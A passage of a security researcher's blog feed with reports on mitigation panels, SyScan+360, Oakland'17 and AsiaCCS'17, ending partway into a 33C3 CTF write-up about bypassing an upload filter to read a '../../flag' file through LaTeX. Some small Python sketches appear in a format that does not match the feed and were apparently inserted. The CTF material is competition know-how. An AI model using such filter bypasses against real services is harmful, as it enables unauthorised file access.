verge of being deployed in hardware through Intel’s CET extensions. The
panelists agreed that CFI makes exploitation harder but quantifying this
additional hardness is difficult and program dependent. Notably, CFI is not useful
in all contexts and academics should not apply CFI everywhere. For example, in
browsers a JIT compiler/interpreter allows the attacker to generate new code
based on attacker-controlled data. As the JIT compiler, the generated code, and
all other code and data are co-located in a single process, simply protecting
the existing code is not enough to stop an attacker. Another example is
operating system kernels. An attacker achieves her goals by simply flipping bits
in important data structures such as the user id in the process struct or
pointers in the page table. Even if the control-flow is protected through CFI,
data-only attacks are much more severe and direct. Orthogonally, sandboxing
individual components and enforcing least privilege will be more effective than
simply restricting control flow. All is not lost, though: CFI is useful in
particular locations and makes code reuse attacks harder. The question academics
(and the community) should answer is how much harder an attack becomes.&lt;/p&gt;
&lt;p&gt;An orthogonal vector is hardware deployment of mitigations. Intel is targeting a
hardware deployment of a strong backward edge but weak forward edge CFI
solution. With open source hardware such as RISC-V defense mechanisms with
hardware support can realistically be tested by researchers, leveling the
playing field between academia and industry.&lt;/p&gt;
&lt;p&gt;Sandboxing/least privilege is a simple and well known mitigation technique that
restricts a module to a well-defined API, limiting interactions with other code.
Compartmentalization (and sandboxing) is likely more effective than many other
mitigations proposed by academia. What makes sandboxing hard is the requirement
for a redesign of the software. For example, the two main mail servers qmail and
sendmail are fundamentally different. While sendmail follows a monolithic design,
qmail is split into many different components with minimal privileges. To enable
clear separation, qmail had to be designed from scratch to enforce this level of
separation with minimal privileges for individual components. An interesting
question is how to move from monolithic software to individually sandboxed
components.&lt;/p&gt;
&lt;p&gt;As one mitigation alone is clearly not effective against all possible attack
vectors, it becomes clear that a combination of mitigations is required to
defend a system. Mitigations may interact at multiple levels and composition of
defenses is an unsolved problem. One mitigation may protect against one attack
vector but make another attack vector easier. For example, randomizing allocators
may shuffle different allocation classes. On one hand, this makes overflows
into an object of the same class harder, but it allows overflows into other classes.
The interaction between different mitigations may be intricate and we currently
do not reason about these interactions. It would be interesting to develop a
model that allows such reasoning.&lt;/p&gt;
&lt;p&gt;Benchmark suites, or the lack thereof, is another problematic topic when
evaluating mitigations. Many publications are prone to &lt;a class="reference external" href="https://www.cse.unsw.edu.au/~gernot/benchmarking-crimes.html"&gt;benchmarking crimes&lt;/a&gt;. Defenses are
evaluated using only a subset of standard benchmarks (e.g., SPEC CPU2006 for
performance) where individual benchmarks are cherry-picked. Binary-only defenses
are often evaluated only on simple binaries such as the binutils or other small
programs, often excluding the libc. In general, defenses must be evaluated
using the full benchmark suite to enable comparison between different techniques
in addition to realistic work loads. For example, for compiler-based defenses at
least browsers such as Firefox or Chrome should be evaluated and for binary
analysis mechanisms at least Adobe Acrobat Reader and a libc must be evaluated
to show that the techniques can cope with the complexity of real systems. Going
forward we have to develop benchmarks that evaluate security properties as well,
likely for individual attack vectors (&lt;a class="reference external" href="https://wkr.io/publications/oakland2016lava/"&gt;Lava&lt;/a&gt; is an example of such a
framework). This would allow a centralized testing infrastructure for different
mechanisms and a quantitative comparison of mechanisms compared to the
qualitative arguments that are currently used.&lt;/p&gt;
&lt;p&gt;Reproducibility is a big problem in academia. Many defenses are simply published
in paper form with some performance evaluation. Reproducing the results of a
paper is hard and most of the time impossible. Papers that overclaim their
solutions without backing up the results through an open-source mechanism cannot
be reproduced and should be taken with a grain of salt. Going forward, we
should push the community towards releasing implementation prototypes but under
the assumption that these are implementation prototypes and not production
mechanisms. One solution could be to release docker containers with the specific
software that allows reproducing the results. If required, the software license
could be restricted to only allow reproduction of results. This is a fine line:
on one hand we want to compare against other mechanisms, but on the other hand
bugs that are orthogonal to the defense policy should not become a reason to
attack an open-sourced defense.&lt;/p&gt;
&lt;p&gt;Generally, evaluating defense mechanisms is hard, resulting in a
multi-dimensional problem -- especially for system security. System security inherits
the evaluation criteria from systems. Systems research requires rigorous
evaluation of a prototype implementation along the dimensions of runtime
performance and memory overhead. Sometimes complexity of the proposed system is
evaluated as well. As defenses are complementary to a system (i.e., they build
on top of a system) the additional complexity becomes much more problematic. In
addition, we have to come up with metrics to evaluate different threat models
and attacks, allowing us to infer how much harder an attack becomes given that a
specific defense is used.&lt;/p&gt;
&lt;p&gt;Current computers and their systems are hugely complex and only deterministic in
abstraction. Many concurrent layers interact with often hard to distinguish
effects. Security crosscuts all the layers of our systems from hardware to the
highest layer of the software stack. Defenses have to reason along all these
layers, and the guarantees may be broken at any layer. While we often argue from
the top of the stack down (or from a theoretical perspective), we should also
adopt an electrical engineering view that reaches down to the lowest level.&lt;/p&gt;
&lt;p&gt;When transitioning defenses into practice, researchers are often faced with
additional difficulties. Defenses add overhead along several dimensions and
increase the complexity of a software system. Researchers therefore need to
argue in favor of their system. Attacks, on the other hand, are purely technical,
as an exploit proves that a defense can be bypassed. In short: offense is
technical while defense is political. Even shorter: you cannot argue against a
root shell.&lt;/p&gt;
</content><category term="Conferences"></category><category term="panel"></category><category term="security"></category><category term="exploit"></category><category term="mitigation"></category><category term="ESSoS"></category><category term="DIMVA"></category></entry><entry><title>SyScan+360 in Seattle</title><link href="/blog/2017/0531-syscan360.html" rel="alternate"></link><published>2017-05-31T22:15:00-04:00</published><updated>2017-05-31T22:15:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2017-05-31:/blog/2017/0531-syscan360.html</id><summary type="html">&lt;p&gt;Just a couple of days after &lt;a class="reference external" href="/blog/2017/0524-oakland.html"&gt;Oakland '17&lt;/a&gt; I
attended my next information security conference.  This year, SyScan+360 was in
Seattle and I used the time between Oakland and SyScan for a nice road trip from
San Jose to Seattle.  SyScan is not an academic but an industry conference …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Just a couple of days after &lt;a class="reference external" href="/blog/2017/0524-oakland.html"&gt;Oakland '17&lt;/a&gt; I
attended my next information security conference.  This year, SyScan+360 was in
Seattle and I used the time between Oakland and SyScan for a nice road trip from
San Jose to Seattle.  SyScan is not an academic but an industry conference. As
I've been to SyScan before (see write-ups for the &lt;a class="reference external" href="/blog/2014/0403-SyScan14-day1.html"&gt;first&lt;/a&gt; and &lt;a class="reference external" href="/blog/2014/0404-SyScan14-day2.html"&gt;second&lt;/a&gt;
day), I knew that I could expect a great technical program focused on attacks
hosted by the awesome Thomas Lim. SyScan focuses on fewer but higher quality
talks and as always, I will focus on my personal highlights.&lt;/p&gt;
&lt;div class="section" id="matt-miller-towards-mitigating-arbitrary-native-code-execution-in-windows-10"&gt;
&lt;h2&gt;Matt Miller: Towards Mitigating Arbitrary Native Code Execution in Windows 10&lt;/h2&gt;
&lt;p&gt;Matt Miller gave a super packed talk about protecting Windows 10 applications
against code reuse attacks. The talk was so dense that it was challenging to
follow all the details and I really hope that the talk will become available
online in the near future. The overall goal of the Windows security team is to
kill entire bug classes while following required design practices.&lt;/p&gt;
&lt;p&gt;At its core, Windows uses two techniques to prevent arbitrary code generation:
code integrity guard, which restricts the DLLs that can be loaded by checking their
signatures, and arbitrary code guard, which enforces immutable code so that data
cannot become code. As a JIT compiler could compromise the guarantees of the
arbitrary code guard, Edge moved the JIT compiler out of the main browser process.
JavaScript can only generate new machine code through a well-defined interface.&lt;/p&gt;
&lt;p&gt;In addition to this baseline, control-flow guard protects against control-flow
hijacking with the limitation that backward edges are not protected and valid
functions can be called out of context. A design principle of CF Guard is to
fail open, i.e., indirect calls to COTS binaries are permitted to enable
backward compatibility.&lt;/p&gt;
&lt;p&gt;Microsoft's defenses are evaluated according to the following criteria:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Security: a defense must be robust against the threat model.&lt;/li&gt;
&lt;li&gt;Performance: the defense must be within reason compared to the value it gives.&lt;/li&gt;
&lt;li&gt;Compatibility: a defense must be compatible with existing code.&lt;/li&gt;
&lt;li&gt;Interoperability: defenses must interoperate with COTS/binary code.&lt;/li&gt;
&lt;li&gt;ABI compliant: rebuilding world is not possible.&lt;/li&gt;
&lt;li&gt;Agility: any defense added to the toolset increases complexity. Defenses must
be agile enough to enable further and future development.&lt;/li&gt;
&lt;li&gt;Developer friction: cost for developers must be minimal, i.e., requiring
code changes is not an option.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Matt later talked about return flow guard, an ABI compliant shadow stack that
leverages x86_64 segmentation. Unfortunately there were attacks against return
flow guard that stopped it from being deployed.&lt;/p&gt;
&lt;p&gt;Overall, this was a fun, fast paced, packed talk that explained the
considerations industry has to follow when deploying mitigations and defenses.
More information is available in a &lt;a class="reference external" href="https://blogs.windows.com/msedgedev/2017/02/23/mitigating-arbitrary-native-code-execution/"&gt;Microsoft blog post&lt;/a&gt;
and Matt made &lt;a class="reference external" href="https://github.com/Microsoft/MSRC-Security-Research/raw/master/presentations/2017_05_SysScan360_Seattle/SyScan360_Miller_Towards_Mitigating_Arbitrary_Native_Code_Execution.pdf"&gt;the slides&lt;/a&gt;
available as well.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="li-kang-enhancing-symbolic-fuzzing-with-learning"&gt;
&lt;h2&gt;Li Kang: Enhancing Symbolic Fuzzing with Learning&lt;/h2&gt;
&lt;p&gt;Li explained his project on scaling symbolic fuzzing. Based on a concrete
execution he derives information about the execution, collecting constraints
along the way. The program runs in phases, for each phase information is parsed
and then propagated to the next phase. This data is then used to guide symbolic
execution along these starting points. The combination of these techniques
allows researchers to scale symbolic execution to larger and more complex
programs.&lt;/p&gt;
&lt;p&gt;The bag of tricks for further scaling involves selected state scheduling.
Heuristics based on concrete program executions allow a better selection of
reasonable states and help move symbolic execution past the early stages of the
program.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="oleksandr-bazhaniuk-yuriy-bulygin-exploring-your-system-deeper-is-not-naughty"&gt;
&lt;h2&gt;Oleksandr Bazhaniuk, Yuriy Bulygin: Exploring Your System Deeper is Not Naughty&lt;/h2&gt;
&lt;p&gt;Alex and Yuriy gave an interesting talk about chip security. For chip firmwares,
many different functional modules are simply slammed together with different
code quality and security constraints. Some of the modules may not even be
signed, others contain firmware that is read-writable. A simple module-based
analysis may detect bugs in highly privileged code. This whole area is not well
explored.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="omri-herscovici-omer-gull-pwned-in-translation-from-subtitles-to-rce"&gt;
&lt;h2&gt;Omri Herscovici, Omer Gull: Pwned in Translation - from Subtitles to RCE&lt;/h2&gt;
&lt;p&gt;This was by far the most entertaining talk at SyScan this year. Omri and Omer
showed a set of remote code execution bugs in different video players and home
entertainment systems through subtitle parsing. Surprisingly, there is a large
amount of different subtitle formats with different powers. Some of them allow
background commands, font embedding, or even image decoding. Overall, they
pwned PopcornTime, Kodi, Stremio, and VLC. Fun times and a very entertaining
talk.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="joe-fitzpatrick-nation-state-capabilities-lone-wolf-budget"&gt;
&lt;h2&gt;Joe FitzPatrick: Nation-State Capabilities, Lone Wolf Budget&lt;/h2&gt;
&lt;p&gt;Listening to emissions of electric devices leaks information about what they are
computing. Tagging and learning the emission patterns allows interesting
applications such as tracking locations. Fun hacker talk.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="mathias-payer-protecting-bare-metal-smart-devices-with-epoxy"&gt;
&lt;h2&gt;Mathias Payer: Protecting bare-metal smart devices with EPOXY&lt;/h2&gt;
&lt;p&gt;I presented our work on EPOXY, smart privilege overlays for embedded systems.
Bare metal devices are protected through a privilege overlay. Software no longer
runs directly at the highest privilege but at user-space privileges. To enable
kernel functionality, privileged functions are identified and these instructions
are lifted and tagged to execute at kernel privileges. This technique allows us
to drop privileges for the majority of code and build higher level security
primitives on top of the privilege separation. &lt;a class="reference external" href="https://nebelwelt.net/publications/files/17SyScan360-presentation.pdf"&gt;Slides&lt;/a&gt;,
&lt;a class="reference external" href="https://github.com/HexHive/EPOXY"&gt;source&lt;/a&gt;, and &lt;a class="reference external" href="https://nebelwelt.net/publications/files/17Oakland.pdf"&gt;paper&lt;/a&gt; are available online.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;SyScan was again a fun conference and I enjoyed discussions with industry. Due
to the location in Seattle a lot of Microsoft folks were around and it was very
informative to hear about their constraints. In addition, exchanging ideas in an
open hacker environment is always fun.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="SyScan"></category><category term="security"></category></entry><entry><title>Oakland'17, the IEEE Symposium on Security and Privacy</title><link href="/blog/2017/0524-oakland.html" rel="alternate"></link><published>2017-05-24T21:12:00-04:00</published><updated>2017-05-24T21:12:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2017-05-24:/blog/2017/0524-oakland.html</id><summary type="html">&lt;p&gt;Every year, the Oakland conference is one of the highlights of security
research. As likely the most competitive of the big four conferences, Oakland is
always a great place to sync up with friends and learn about new trends in
security (then again, being in the PC committees for most …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Every year, the Oakland conference is one of the highlights of security
research. As likely the most competitive of the big four conferences, Oakland is
always a great place to sync up with friends and learn about new trends in
security (then again, being in the PC committees for most other conferences
exposes you to trends anyway but the signal to noise ratio is a little lower).&lt;/p&gt;
&lt;p&gt;This year there were 582 people registered for the symposium, so Oakland is
getting big. For the program, a total of 610 abstracts were submitted that led
to 457 submissions, with 419 papers making it to round 0. Of those, 231 survived
to round 2, 94 to round 3, and 60 to round 4, for a total of 60 accepted out of
419 and an acceptance rate of 14.3%.&lt;/p&gt;
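As a quick sanity check, the review funnel above is internally consistent:

```python
# Quick check of the review funnel reported above.
abstracts = 610      # abstracts submitted
submissions = 457    # full submissions
round0 = 419         # papers making it to round 0
accepted = 60        # final accepts
rate = accepted / round0 * 100
print(f"{rate:.1f}%")  # → 14.3%
```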
&lt;p&gt;Either I am getting more social (which is unlikely) or I have just accumulated
enough accomplices and peers over the last couple of years so that I spend most
of my time in the hallway track, discussing new research directions and possible
collaborations with my peers instead of listening to all the talks. Or we just
ramble and rant about specific reviewers. In any case, I end up attending far
fewer talks, either because I've already read the paper (sometimes a couple of
times) or because the topic is not close enough to my interests.
Therefore, I only report on some highlights of the conference that left a good
impression.&lt;/p&gt;
&lt;div class="section" id="nicolas-carlini-david-wagner-towards-evaluating-the-robustness-of-neural-networks"&gt;
&lt;h2&gt;Nicolas Carlini, David Wagner: Towards Evaluating the Robustness of Neural Networks&lt;/h2&gt;
&lt;p&gt;Machine learning is used in more and more applications and so far no evaluation
has looked at the resilience of neural networks in general to adversarial
attacks. Given that the attacker knows the model, how resilient is the neural
network against adversarial input? Nicolas started his talk with how neural
networks vastly improved the classification rate of images, e.g., for text
recognition or object recognition. Compared to the existing heuristics, the
neural networks vastly outperformed the old approach.&lt;/p&gt;
&lt;p&gt;The classification is often used to infer some information about an image. Given
that the attacker has access to the classifier (either directly or indirectly by
submitting images for classification), she can probe and figure out a minimal
set of changes (minimal according to a predefined metric) that misclassifies the
image as something else.&lt;/p&gt;
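The probing idea can be sketched on a toy linear classifier with binary pixels (this is emphatically not the paper's actual attack, which works on real neural networks with gradient-based optimization):

```python
# Toy sketch: greedily flip the most influential pixels of a linear
# classifier until its label changes, minimizing an L0-style
# "number of pixels changed" metric.
def classify(img, weights):
    score = sum(w * p for w, p in zip(weights, img))
    return 1 if score > 0 else 0

def minimal_perturbation(img, weights):
    img = list(img)
    orig = classify(img, weights)
    sign = 1 if orig else -1
    # try pixels in order of influence (|weight|), largest first
    for changed, i in enumerate(
            sorted(range(len(img)), key=lambda i: -abs(weights[i])), 1):
        # flip the pixel in the direction that lowers the original score
        img[i] = 0 if weights[i] * sign > 0 else 1
        if classify(img, weights) != orig:
            return img, changed
    return img, len(img)

adv, n = minimal_perturbation([1, 1, 0, 0], [0.9, 0.3, -0.2, -0.1])
print(n)  # → 2 pixels flipped to change the label
```

Even this trivial model illustrates the finding: a classifier that relies on a few strong features can be flipped by perturbing only those features.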
&lt;p&gt;In this work, Nicolas developed attack models and techniques to probe neural
networks and test their resilience against attacks. The results were rather
surprising, as most models degenerated with only a few changed pixels. As it turns
out, the models learn shallow information to classify images and don't deeply
understand the images. The talk showed the limits of these automated
classification approaches and won the best student paper award.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="getting-security-right"&gt;
&lt;h2&gt;Getting security right&lt;/h2&gt;
&lt;p&gt;Stack Overflow Considered Harmful? The Impact of Copy and Paste on Android
Application Security. In this paper, the authors did a large scale study on
Android applications, evaluating if code snippets from open sources are used
without checking their constraints. The framework first mines a large set of
Android applications, recovering the Java code used in these applications.
Orthogonally, the framework mines StackOverflow to find code snippets for crypto
API usage. These snippets are then labelled as good or bad -- there is a
surprising amount of bad or wonky crypto advice on StackOverflow that will make
applications more vulnerable. Developers without crypto knowledge cannot know
which parameter selection is safe, resulting in buggy applications. Given both
datasets (the decompiled applications and the mined crypto API examples), the
framework searches for matches. Interestingly there was a large amount of code
reuse, including a large amount of bad crypto.&lt;/p&gt;
&lt;p&gt;Comparing the Usability of Cryptographic APIs. Along a similar vein, this paper
analyzes the usability of different crypto APIs. Several crypto libraries offer
similar communication primitives but differ in their APIs. The user study
contained a set of easy and hard tasks that each user
had to solve with the different APIs. Surprisingly, the simplified APIs were not
useful for the more complex tasks as the users did not have enough degrees of
freedom to select the correct parameters. The library that allowed complex
configuration but had good documentation and a well designed API was used for
most correct solutions. As it turns out, good documentation, examples, and
giving developers the ability to choose parameters beat both a bare complex API
and an oversimplified one.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="attacks"&gt;
&lt;h2&gt;Attacks&lt;/h2&gt;
&lt;p&gt;How They Did It: An Analysis of Emission Defeat Devices in Modern Automobiles.
In this project, folks from RUB and UCSD reverse engineered the firmware of the
exhaust system of different cars and inferred how the firmware reacts to
different settings, e.g., reducing the engine's power if certain conditions are
met. Modern engine controls are highly complex and must react to different
situations; detecting the conditions of an ongoing emissions test was just one
addition to these systems.&lt;/p&gt;
&lt;p&gt;The Password MitM Attack. Second factor authorization must be designed carefully
to be effective. As a user is registering with a malicious service, the service
tells the user that they will have to answer a two-factor challenge. At the same
time, the service generates a login to a trusted service on behalf of the user.
The user then relays the second factor token from the trusted service to the
malicious service. If the trusted service does not identify itself (i.e., &amp;quot;your
token is 12345&amp;quot;) then the user does not know from which service the challenge
came. A well designed second factor will send the text messages from the same
well known number and identify the service as part of the challenge. Even then,
some users will ignore this information and continue to log into the malicious
service.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="systems-security-and-authentication"&gt;
&lt;h2&gt;Systems Security and Authentication&lt;/h2&gt;
&lt;p&gt;Protecting bare-metal smart devices with EPOXY. In our talk we presented Abe's
work on protecting bare-metal devices through a privilege overlay. Instead of
running all software at the highest privilege level we drop privileges for the
majority of code and selectively enable privileges for a few instructions that
actually need them (e.g., for IO). Dropping privileges allows us to configure
the Memory Protection Unit (MPU) to enforce access restrictions to code and
data, enforcing non-executable data and non-writable code. To protect against
code reuse and data-only attacks we also apply diversity and a safe stack.&lt;/p&gt;
&lt;p&gt;Norax: Enabling Execute-Only Memory for COTS Binaries on AArch64. In this
project the authors enable execute-only memory for ARM binaries. The analysis
separates code and data into separate pages. Surprisingly, ARM has much more
data embedded in code pages compared to x86 which makes this problem harder. The
authors propose an approach that disassembles and patches the underlying code
and then use a modified loader to update necessary references at runtime. In
addition, a runtime monitor handles any missed references and backpatches them.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="software-security"&gt;
&lt;h2&gt;Software Security&lt;/h2&gt;
&lt;p&gt;Skyfire: Data-Driven Seed Generation for Fuzzing. The authors developed a
targeted fuzzer for XML libraries and found a large number of vulnerabilities in
these packages. It is surprising that no targeted fuzzing has been done on XML
so far.&lt;/p&gt;
&lt;p&gt;VUDDY: A Scalable Approach for Vulnerable Code Clone Discovery. The authors
detect vulnerable code in binaries through code matching. They generate
fingerprints for specific exploits and use these fingerprints to find vulnerable
instances in other libraries. The goal is to identify cloned/forked code that
has not been patched after a security vulnerability was detected. An alternate
approach is to find stolen code or misused code (e.g., use of open-source code
in closed source applications).&lt;/p&gt;
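A toy sketch of the fingerprinting idea (not VUDDY's actual normalization or hash function; the snippet and database entry are invented): normalize a function body, hash it, and look the hash up in a database of known-vulnerable fingerprints.

```python
# Toy fingerprint-based clone detection: strip comments, collapse
# whitespace, hash the normalized body, and match against a database
# of fingerprints of known-vulnerable functions.
import hashlib
import re

def fingerprint(func_body):
    body = re.sub(r"//.*", "", func_body)      # drop line comments
    body = re.sub(r"\s+", " ", body).strip()   # collapse whitespace
    return hashlib.sha256(body.encode()).hexdigest()

# hypothetical database entry for a known-vulnerable snippet
vulnerable_db = {fingerprint("memcpy(dst, src, len); // unchecked")}

# a reformatted clone of the same code still matches
is_clone = fingerprint("memcpy(dst,  src, len);") in vulnerable_db
print(is_clone)  # → True
```

Normalizing before hashing is what lets the approach find clones that were reformatted or trivially edited after being copied.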
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Overall, Oakland was a fun conference and this year there were a bunch of
interesting system security papers. Next to the few papers I highlighted there
were many other interesting sessions that I could not attend. As always, the
program is diverse and covers research in information flow, software security,
embedded systems, hardware, and crypto. In addition, Oakland serves as a
convenient opportunity to sync up with peers at the end of the spring semester
and relax after the stressful CCS deadline (which was 2 days before the
conference).&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="Oakland"></category><category term="security"></category></entry><entry><title>AsiaCCS'17 in Abu Dhabi</title><link href="/blog/2017/0410-asiaccs.html" rel="alternate"></link><published>2017-04-10T10:09:00-04:00</published><updated>2017-04-10T10:09:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2017-04-10:/blog/2017/0410-asiaccs.html</id><summary type="html">&lt;p&gt;This was my second AsiaCCS. After an interesting experience &lt;a class="reference external" href="/blog/2016/0621-AsiaCCS.html"&gt;in China last
year&lt;/a&gt;, this year's AsiaCCS was in the United
Arab Emirates (UAE) in Abu Dhabi. My program for this conference was quite
packed. Two of my students had presentations, Daniele Midi's nesCheck work and
Scott Carr's selective memory safety …&lt;/p&gt;</summary><content type="html">&lt;p&gt;This was my second AsiaCCS. After an interesting experience &lt;a class="reference external" href="/blog/2016/0621-AsiaCCS.html"&gt;in China last
year&lt;/a&gt;, this year's AsiaCCS was in the United
Arab Emirates (UAE) in Abu Dhabi. My program for this conference was quite
packed. Two of my students had presentations: Daniele Midi's nesCheck work and
Scott Carr's selective memory safety work were presented. In addition, I gave an
invited talk about Control-Flow Integrity with detailed metrics and measurements
that we conducted on a large set of open-source mechanisms.
After serving in the program committee, I already knew some of the
interesting papers that would be presented and I'll only highlight a few of them
here.&lt;/p&gt;
&lt;div class="section" id="software-guard-extension"&gt;
&lt;h2&gt;Software Guard Extension&lt;/h2&gt;
&lt;p&gt;Detecting Privileged Side-Channel Attacks in Shielded Execution with Déjà Vu.
The paper presents how one can detect AEXs (asynchronous enclave exits) through
side channels. Whenever the number of AEXs rises past a certain threshold, an
attack against the SGX container is likely taking place. The proposed solution
requires a specification of this threshold, which may allow the attacker to tune
the attack to stay just below it.&lt;/p&gt;
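A minimal sketch of this detection heuristic (the threshold value and window counts are invented for illustration):

```python
# Count asynchronous enclave exits (AEXs) per observation window and
# flag windows that exceed a threshold. As noted above, an attacker
# who knows the threshold can try to stay just below it.
THRESHOLD = 100  # AEXs per window (hypothetical value)

def flag_windows(aex_counts):
    return [count > THRESHOLD for count in aex_counts]

flags = flag_windows([3, 7, 250, 4])
print(flags)  # → [False, False, True, False]
```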
&lt;p&gt;SGX-Log: Securing System Logs With SGX. Log files are targets for attackers as
the initial states of the attack may be shown in those log files and they could
be used for forensic purposes. To protect log files from attackers, this project
moves them into an SGX enclave. The SGX container provides confidentiality and
integrity, protecting the log files against tampering. Enclaves may be
deleted if the attacker gains access to the machine. The solution therefore does
not protect against deleting log files but focuses on tamper resistance. The
enclave can therefore serve as a trusted third party without the need to send
the log data over the network.&lt;/p&gt;
&lt;p&gt;The Circle Game: Scalable Private Membership Test Using Trusted Hardware. SGX is
used for a local secure set test. Consumers send hashes to the cloud and the
cloud then checks for matches (e.g., for malware), making sure that no
information leaks about the hashes sent as input.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="memory-safety"&gt;
&lt;h2&gt;Memory safety&lt;/h2&gt;
&lt;p&gt;Strict Virtual Call Integrity Checking for C++ Binaries. This paper is
very similar to the &lt;a class="reference external" href="https://www.internetsociety.org/doc/marx-uncovering-class-hierarchies-c-programs"&gt;NDSS MARX paper&lt;/a&gt;,
extending the analysis with some form of CFI. The binary analysis reverse
engineers C++ binaries and recovers indirect call sites and class hierarchies.
After recovering this information, the indirect dispatches in the binary are
protected through a type-based lookup similar to &lt;a class="reference external" href="https://nebelwelt.net/publications/files/16NDSS.pdf"&gt;VTrust&lt;/a&gt; but for binaries. The
results are great: precision is high and overhead is low. This work has been
developed concurrently to MARX.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="our-papers"&gt;
&lt;h2&gt;Our papers&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="https://nebelwelt.net/publications/files/17AsiaCCS2.pdf"&gt;Memory Safety for Embedded Devices with nesCheck&lt;/a&gt;. nesCheck is a
compiler-based approach that enforces a CCured-style type system on top of C
source code for embedded systems. Based on a compiler-based analysis, pointers
are classified as safe (no pointer arithmetic), sequence (only iteration, e.g.,
++ or --), and dynamic (arbitrary pointer arithmetic). Pointers classified as
safe do not need any instrumentation. For sequence and dynamic pointers our
compiler pass adds corresponding instrumentation to protect any accesses. Main
differences to CCured are the port to embedded systems and using a modern
compiler that allows fine-grained optimizations. See the paper for details.&lt;/p&gt;
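The three pointer classes can be sketched as a toy classifier (the operation labels are invented for illustration; the real analysis runs inside the compiler over LLVM IR):

```python
# Toy version of the classification: arbitrary arithmetic makes a
# pointer "dynamic", pure iteration makes it "sequence", and
# everything else is "safe" and needs no instrumentation at all.
def classify_pointer(ops):
    if "arith" in ops:
        return "dynamic"   # full bounds metadata and checks needed
    if "inc" in ops or "dec" in ops:
        return "sequence"  # bounds checks on iteration needed
    return "safe"          # no instrumentation required

kinds = [classify_pointer(["deref"]),
         classify_pointer(["inc", "deref"]),
         classify_pointer(["arith"])]
print(kinds)  # → ['safe', 'sequence', 'dynamic']
```

The payoff of the classification is that only the rarer sequence and dynamic pointers pay any runtime cost.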
&lt;p&gt;&lt;a class="reference external" href="https://nebelwelt.net/publications/files/17AsiaCCS.pdf"&gt;DataShield: Configurable Data Confidentiality and Integrity&lt;/a&gt;. DataShield allows the
programmer to specify what data of a program is sensitive. Based on annotations
these sensitive types are protected against memory safety vulnerabilities,
enforcing integrity and confidentiality. Classic (unprotected) data cannot interfere with
the protected data. To support such a system, all data (heap, globals, and
stack) has to be split into safe and unsafe data. The runtime layout of a
DataShield process is separated into safe and classic views with no interaction
between classic and safe. Two case studies protect an SSL library and the SPEC
benchmarks.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Visiting the UAE was interesting and I had time to explore both Dubai and Abu
Dhabi. The NYU campus in Abu Dhabi is a modern, open campus and the conference
was well organized. The memory safety and embedded sessions were very
interesting as were the extensive social events which included dinners and a
city tour.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="AsiaCCS"></category><category term="security"></category></entry><entry><title>33C3 CTF: Fun times</title><link href="/blog/2016/1230-33C3-CTF.html" rel="alternate"></link><published>2016-12-30T15:39:00-05:00</published><updated>2016-12-30T15:39:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2016-12-30:/blog/2016/1230-33C3-CTF.html</id><summary type="html">&lt;div class="section" id="pdfmaker-75-points"&gt;
&lt;h2&gt;pdfmaker (75 points)&lt;/h2&gt;
&lt;p&gt;The first challenge I tried was pdfmaker. Surprisingly I spent way too much time
on this simple starter challenge. I initially planned to use this challenge as a
warm up but ended up spending about 10 hours on it, mostly due to me overlooking
simpler solutions that are …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;div class="section" id="pdfmaker-75-points"&gt;
&lt;h2&gt;pdfmaker (75 points)&lt;/h2&gt;
&lt;p&gt;The first challenge I tried was pdfmaker. Surprisingly I spent way too much time
on this simple starter challenge. I initially planned to use this challenge as a
warm up but ended up spending about 10 hours on it, mostly due to me overlooking
simpler solutions that are obvious in hindsight. On the route to this challenge
I learned a lot about TeX and LaTeX that I honestly would not have needed to
know and even started asking questions on Stack Overflow.&lt;/p&gt;
&lt;p&gt;The pdfmaker service allows you to upload tex files, sty files, and a bunch of
other types of files and to compile tex files. The service also allows you to
view generated log files. Interestingly, when uploading files the text is
filtered and lines containing &lt;cite&gt;..&lt;/cite&gt;, &lt;cite&gt;/&lt;/cite&gt;, or &lt;cite&gt;\x&lt;/cite&gt; are removed. The removal of
the first two types of lines is obvious as the flag is available in &lt;cite&gt;../../flag&lt;/cite&gt;
but the last one took me longer to figure out. So the challenge is to write a
LaTeX program that opens the flag and prints it to the log file. What makes the
challenge harder is that the LaTeX installation does not have any auxiliary
packages available, so the LaTeX document has to be self sufficient.&lt;/p&gt;
&lt;p&gt;Overcoming the &lt;cite&gt;..&lt;/cite&gt; restriction is easy as two &lt;cite&gt;.&lt;/cite&gt; can easily be concatenated.
Overcoming the &lt;cite&gt;/&lt;/cite&gt; restriction was much much much harder. I soon figured that
the log file contains &lt;cite&gt;2015/Debian&lt;/cite&gt; in the first line which contains a &lt;cite&gt;/&lt;/cite&gt;
character that we could use. The next question is how to access a substring or
character inside a string through LaTeX which is surprisingly hard and took me
way too long to figure out. I assumed that we cannot use libraries but what I
forgot was that we can upload libraries. (This sounds simple but was an amazing
